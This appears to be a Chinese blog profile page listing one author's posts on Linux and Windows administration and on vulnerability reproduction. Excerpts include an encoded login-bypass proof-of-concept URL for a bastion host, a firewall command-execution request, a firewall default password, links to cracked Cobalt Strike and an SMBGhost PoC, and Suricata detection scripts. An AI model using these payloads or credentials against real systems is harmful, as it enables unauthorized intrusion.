自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(65)
  • 资源 (2)
  • 收藏
  • 关注

原创 移动硬盘GPT分区导致在电脑上面无法读取解决办法

1、进入windows的“命令提示符”,输入DiskPart,然后回车,启动DiskPart程序,进入如下窗口。输入 list disk, 回车 ,这时显示出计算机安装的磁盘列表,依次是磁盘 0,磁盘1,磁盘2 这里可以看到磁盘的编号和每个硬盘的容量。5、开始菜单,进入“Windows管理工具”,选择“计算机管理”,选择存储项目中的“磁盘管理”,右键对相应的磁盘进行分区和格式化。格式化结束后,到此为止就可以正常使用这个磁盘了。cmd输入diskmgmt.msc,打开磁盘管理,可以看到。

2024-04-17 16:01:28 3720

原创 逻辑卷扩容

逻辑卷扩容

2023-08-08 11:33:58 212

原创 webd实现web界面文件上传下载

web界面上传下载

2023-06-13 22:28:45 598

原创 两台服务器ssh免密登录配置

通过建立私秘进行免认证登录Linux服务器。因工作需要,需要配置两台服务器免密登录。A服务器:192.168.139.152。B服务器:192.168.139.162。

2023-02-27 18:39:44 1236

原创 OneKeyGhost工具进行备份还原windows操作系统

OneKeyGhost工具进行系统备份以及还原操作系统

2023-01-16 15:10:35 4320

原创 iptables防火墙

iptables防火墙说明以及规则

2023-01-13 17:53:02 589

原创 麒麟v10服务器安装vnc

麒麟v10国产服务器安装远程桌面

2022-11-19 21:20:31 1272

原创 python统计python代码的行数空白数代码注释行数

python 注释代码行数

2022-10-30 13:41:40 406

原创 python将房贷数据写进excel表格

说明使用python以及csv库,生成的贷款等信息写入excel文件。# -*- coding:utf-8 -*-# author: php00py#书香府import timeimport csvfrom colorama import init,Foreinit(autoreset=True) def sxf(sxf): #sxf_dj = float(input("输入单价:")) sxf_dj = sxf sxf_pf = 113

2022-04-02 14:48:08 754

原创 Linux运维-磁盘挂载配置

磁盘扩容、逻辑卷、物理卷

2022-03-14 14:33:43 2535

原创 Linux系统/根分区扩容

背景项目中遇到/分区不足需要扩容,需要对/分区进行扩容查看主机挂载信息查看当前挂载使用的磁盘信息df -Th使用fdisk –l 查看当前主机磁盘信息,给主机挂上多余的磁盘通过 fdisk /dev/sdb 操作来分出一块分区/dev/sdb1,将磁盘修改成lvm[root@localhost ~]# fdisk /dev/sdbWelcome to fdisk (util-linux 2.23.2).Changes will remain in memory only, until

2021-12-30 11:03:33 3653

原创 cobaltstrike4.0学习篇-主机上线

前言1、 cobaltstrike4.0下载地址:https://gitee.com/jikemofan/cobaltstrike-crackedcobaltstrike4.0-cracked.zip (破解版)cobaltstrike4.0-original.zip(原版)2、kali下载安装下载下来后解压缩并且给teamserver设置一下执行权限即可。cobaltstrike4.0使用1、启动Cs4服务器./teamserver cs4服务器IP地址 密码./teamser

2021-05-27 15:21:45 919

原创 齐治堡垒机某版本任意用户登录漏洞复现

漏洞点/audit/gui_detail_view.phppoc/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shtermfofaapp="齐治科技-堡垒机"验证URLhttps://xx.xx.xx.xx/audit/gui_detail_view.php?to

2021-05-20 15:09:30 3437 2

原创 suricate规则更新脚本

前提因为工作需要,需要从规则库中去更新最新的规则内容思路将新的规则文件去和老的规则文件做对比,将新的规则内容不在老的规则文件里面视为这个是需要更新添加的规则。脚本# -*- coding:utf-8 -*-#更新所有规则的文件,将所有的规则合并后通过新的规则文件和老的规则文件对比,将新规则文件中不在老规则的文件内容提取出来。import re import osoldrule = [] #老的规则newrule =[] #新的规则uprules =[]oldlj = [] #

2021-05-11 16:06:56 242

原创 网康下一代防火墙 命令执行

网康下一代防火墙 命令执行fofo搜索漏洞路径/directdata/direct/router漏洞数据包POST /directdata/direct/router HTTP/1.1Host: 192.168.1.86Connection: closeContent-Length: 160Upgrade-Insecure-Requests: 1{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/

2021-04-29 15:59:30 1302

原创 佑友防⽕墙-默认密码以及命令执行漏洞

漏洞环境FOFA:title=“佑友防火墙”默认密码User: adminPassWord: hicomadmin命令执行登录后台 系统管理 --> 维护⼯具 --> Ping

2021-04-29 09:48:14 411

原创 将suricata中的msg英文转化为中文的python脚本

前提因工作需要,需要对suricata更新中的msg字段中的英文转化为中文。#excel的文档python脚本# -*- coding:utf-8 -*-#'msg: "(.*?)"|msg:"(.*?)";'#ms = "".join(msg[0])#该脚本是将英文的msg转化为中文的msgimport re sum = 0zhmsg =[]with open("1.txt",'r',encoding='utf-8')as fr: for i in fr.readlines

2021-04-21 10:28:32 417

原创 某东某东的eid以及fp的值获取脚本

<html> <head></head> <body> <div id="info">正在获取某东eid、fp的值……</div> <hr> <div id="eid"></div> <div id="fp"></div> </body></html> &lt.

2021-02-20 15:57:26 395

原创 Apache Druid 远程代码执行漏洞 CVE-2021-25646以及suricata检测

0x01 漏洞描述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏

2021-02-03 17:57:20 370

原创 ThinkPHP 2.x 任意代码执行漏洞复现以及suricata规则检测

0x01 简介Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。0x02 漏洞Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。在CVE-2017-2824中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。0x03 环境搭建(1)下载环境sv

2021-01-19 16:18:19 517 1

原创 Lanproxy 路径遍历漏洞 (CVE-2021-3019)复现以及suricata检测

0x01 Lanproxy简介Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)0x02 漏洞简介本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。0x03 影响版本lanproxy 0.10x04 环境搭建(1)Lanproxy下

2021-01-12 17:26:29 1480 4

原创 Apache Flink漏洞(CVE-2020-17519)复现以及suricata规则检测

0x01 漏洞简介Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。0x02 影响版本1.11.01.11.11.11.20x03 环境搭建 svn export https://github.com/vulhub/vulhub/trunk/flink/进入CVE-2

2021-01-06 15:36:22 1537 2

原创 下载GitHub里面的独立目录

前提在GitHub里面有很多目录,此时如果想使用GitHub里面的某个单独目录而不使用整个目录使用 git 只能克隆整个项目,而不能克隆项目里面的单个目录。解决使用svn工具如果没有svn,使用如下命令安装yum install svn -y需下载的单独GitHub里面的单个目录https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2020-10199使用svn下载,将/tree/master/更改为/trunk/svn ex

2020-12-17 11:05:01 162

原创 centos7下同时安装python2和python3

0x00 安装系统腾讯云主机 centos 7.40x01 下载python3任意一个目录下,下载python3的安装包wget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tgz0x02 解压缩tar xvf Python-3.7.0.tgz0x03 移动到/usr/local/mv Python-3.7.0 /usr/local/0x04开始安装在开始安装之前,先将依赖安装好。有些是安装好的就可以不需要安装,为了

2020-11-05 09:49:26 992 2

原创 kali下安装nessus漏扫工具

1、nessus下载2、上传到kali解压缩dpkg -i Nessus-8.12.0-debian6_amd64.deb然后执行命令启动 /bin/systemctl start nessusd.service3、web登录安装登录方式,https://kali的IP:8834https://192.168.124.131:8834/通过邮箱获取激活码设置账户密码...

2020-10-16 16:49:11 1389

原创 Linux下普通用户变为root权限的三种方法

0x01加普通用户useradd xiaoming 创建用户小明passwd xiaoming 创建小明的密码0x02 将xiaoming的权限变为root权限方法11、修改 /etc/sudoers 文件,找到106行,把前面的注释(#)去掉2、将xiaoming添加到root组(wheel)命令:usermod -g root xiaoming之后xiaoming就拥有root的权限了方法21、修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行内容:x

2020-08-26 17:48:53 21296 12

原创 2020HW深某服0day复现

0x01 描述终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。0x02 背景2020年HW第1天,深某服EDR被爆0day的截图在广大安全朋友圈中广为传播,后续hw暂停。0x03 漏洞复现以fofa搜索为例子,搜索语法: title=“

2020-08-25 11:23:46 1018

原创 对xss的介绍以及概述

**何为XSS **首先,xss(Cross Site Scripting)是为了不和css(Cascading Style Sheets)缩写混淆而缩写为xss,直接翻译过来就是跨站脚本。跨站脚本攻击是常见的前端web攻击。攻击者通过在页面中插入精心构造的恶意JavaScript脚本。引诱用户去点击构造的js恶意代码。当受害者去点击这些恶意代码后,游览器会去解析执行恶意的js代码。从而导致窃取用户身份/钓鱼/传播恶意代码等危害。很常见的一个xss攻击就是弹窗。XSS的分类反射型储存型DOM型

2020-07-04 22:41:53 1251

原创 CVE-2020-0796蓝屏复现

0x01 漏洞描述SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出可在下放地址查看详细信息https://www.mcafee.c

2020-06-11 16:58:12 606

原创 seacms前台getshell

0x01 简介海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。0x02 环境搭建使用phpstudy进行搭建。将整个upload上传到phpstudy目录下的www目录。将upload更改为seacms。http://xxx.xxx.xxx.xxx/seacms/install/index.php进行安装。安装成功后访问前台界面

2020-06-11 11:48:38 1175 1

原创 hexo部署到云服务器上

0x00 准备工作本地电脑window10一台云服务器一台0x01 本地Windows10配置安装gitwindows10安装git进入git官网下载。选择对应得版本一路默认安装。安装Node.jswindows进入node.js官网进入下载安装安装hexo先创建一个文件夹myblog(用来存放所有blog的东西),然后cd到myblognpm i -g hexohexo init配置hexo配hexo博客的主题,站点。0x02 云服务器配置云主机是centos7.6主机

2020-05-31 17:57:35 788

原创 应急响应技巧

了解事件发生时间-事件类型(挖矿、勒索)-受影响系统的情况(运行什么服务、端口)询问客户或运维人员发现异常事件的具体时间以及影响范围。及时隔离防止继续感染影响范围扩大事件主机需要了解的情况主机是windows/linuxOA系统/邮件系统/财务系统/web官网等,业务系统是否可关停是否有弱口令,远程管理端口是否开放都开放了哪些端口,有什么应用服务,开发的服务是否存在漏洞分析是否做了...

2020-04-16 14:33:12 677

原创 http协议知多少

http简介HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。。http工作原理HTTP协议定义Web客户端如何从Web服务器请求Web页面,以及服务器如何把Web页面传送给客户端。HTTP协议采用了请求/响应模型。客户端向服务器发送一个请求报文,请求...

2020-04-14 11:38:13 433

原创 通达OA文件上传+文件包含导致远程代码执行漏洞复现

漏洞环境搭建下载通达OA,一路下一步自行安装

2020-03-19 13:57:16 4039 6

原创 xss挑战通关笔记

xss小游戏通关笔记levle1level2level3level4level5level6level7level8level9level10level11level12level13level14level15level16level17level18levle1在url中输入tt,页面输出tt在url中构造这段js代码<script>alert(1)</script...

2020-03-17 17:03:55 777

原创 sqlmap使用总结

安装git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-devoptions选项–version 显示程序的版本号并退出-h, –help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为1)Target(目标):以下至少需要设置其中一个选项,设置目标 URL。-d DIRECT 直接连接到...

2020-03-17 11:24:24 323

原创 一次实战SQL注入过防火墙

0x01 注入点https://www.xxxx.com/xxxxx?id=16在其后面添加单引号,数据库报错添加and 1=1 --+,依然报错,猜测是数字型注入猜测字段?id=16 order by 1,2,3,4,5,6,7,8 --+出现Unknown column ‘8’ in 'order clause去掉8,?id=16 order by 1,2,3,4,5,6,7–+...

2020-03-15 22:58:40 957

原创 PHP数据类型

0x01. php数据类型字符串(String)、整型(Integer)、浮点型(Float)、布尔型(Boolean)、数组(Array)、对象(Object)、空值(Null)0x02 字符串一个字符串是一串字符串的序列,比如"hello word"可以将任何文本放在单引号或者双引号中。<?php$sts ="你好啊,我是PHP的字符串";echo $sts;?>...

2020-03-12 02:19:13 217

原创 docker安装AWVS13

1.前提先安装好docker启动docker service docker start第一步:拉起acunetix镜像docker pull vouu/acunetix第二步docker run -it -d -p 443:3443 vouu/acunetix登录信息login: https://localhostEmail: contact@manhtuong.ne...

2020-03-10 17:59:09 5869 2

原创 将新版kali白色root改为红色

今天更新了kali2020.1,发现root终端的颜色是白色,初始用户不在是root,而是变成了kali登录root用户,发现终端的颜色是白的,不是红色的。用着很不习惯。如图所示cpcp /home/kali/.bashrc /root将kali目录下的.bashrc复制到root目录下然后替换终端颜色source .bashrc...

2020-03-10 16:17:42 2614 3

CVE-2020-0796-PoC-master.zip

SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出。

2020-06-11

seacms.zip

seacms前台getshell源码文件。海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。

2020-06-11

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除